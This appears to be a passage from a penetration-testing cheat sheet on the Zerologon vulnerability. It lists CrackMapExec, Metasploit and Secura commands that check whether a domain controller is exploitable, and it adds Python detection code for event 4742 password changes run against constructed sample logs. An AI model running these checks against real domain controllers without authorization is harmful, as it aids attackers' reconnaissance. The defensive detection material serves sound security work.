Zerologon (CVE-2020-1472) should only be exploited if you are aware of the consequences. Exploitation will result in the domain controller machine password being changed and will break domain replication if not restored to the original setting.
```
# Checking exploitability with CrackMapExec
crackmapexec smb $ip -u $username -p $password -M zerologon

# Checking exploitability with Metasploit
use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
set rhosts $ip
check

# Checking exploitability with the Secura tester
# https://github.com/SecuraBV/CVE-2020-1472
./zerologon_tester.py $dcnetbiosname $ip
```
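The machine password change described in the warning above is also what defenders can look for in the Security log. The following is an added example, not part of the original page or of any tool listed here: it triages Windows Security event 4742 ("A computer account was changed") records for a domain controller account whose password was set by `ANONYMOUS LOGON`. The dict layout, the `DC01$` account name and the sample records are assumptions constructed for illustration, and a hit is a lead to investigate rather than proof of exploitation.

```python
# Added example: triage exported Security event 4742 records for a DC machine
# account password set by ANONYMOUS LOGON. Field names follow the 4742 event
# data; the dict layout and all sample values are constructed.

DC_ACCOUNTS = {"DC01$"}  # assumption: machine accounts of your domain controllers


def is_suspicious_dc_password_change(event, dc_accounts=DC_ACCOUNTS):
    """Return True when a 4742 event shows an anonymous password set on a DC account."""
    if event.get("EventID") != 4742:
        return False
    targets = {name.upper() for name in dc_accounts}
    if event.get("TargetUserName", "").upper() not in targets:
        return False
    # "-" in PasswordLastSet means this change did not touch the password
    if event.get("PasswordLastSet", "-") == "-":
        return False
    return event.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON"


def find_suspicious(events, dc_accounts=DC_ACCOUNTS):
    """Filter a list of event dicts down to the ones worth investigating."""
    return [e for e in events if is_suspicious_dc_password_change(e, dc_accounts)]


# Constructed sample records (not real log data)
SAMPLE_EVENTS = [
    # password change made under the DC's own account
    {"EventID": 4742, "TimeCreated": "2020-09-20T03:14:07Z", "TargetUserName": "DC01$",
     "SubjectUserName": "DC01$", "PasswordLastSet": "9/20/2020 3:14:07 AM"},
    # DC password set by an anonymous session: the pattern to investigate
    {"EventID": 4742, "TimeCreated": "2020-09-21T10:02:44Z", "TargetUserName": "DC01$",
     "SubjectUserName": "ANONYMOUS LOGON", "PasswordLastSet": "9/21/2020 10:02:44 AM"},
    # attribute change on the DC account that did not set the password
    {"EventID": 4742, "TimeCreated": "2020-09-21T10:05:00Z", "TargetUserName": "DC01$",
     "SubjectUserName": "ANONYMOUS LOGON", "PasswordLastSet": "-"},
    # workstation account, outside the DC list
    {"EventID": 4742, "TimeCreated": "2020-09-21T11:00:00Z", "TargetUserName": "WS07$",
     "SubjectUserName": "ANONYMOUS LOGON", "PasswordLastSet": "9/21/2020 11:00:00 AM"},
    # unrelated logon event
    {"EventID": 4624, "TimeCreated": "2020-09-21T11:30:00Z", "TargetUserName": "DC01$",
     "SubjectUserName": "ANONYMOUS LOGON"},
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(f"{hit['TimeCreated']} {hit['TargetUserName']} password set by {hit['SubjectUserName']}")
```

Legitimate machine account password changes can also match this pattern, so correlate hits with the time of any authorized testing before escalating.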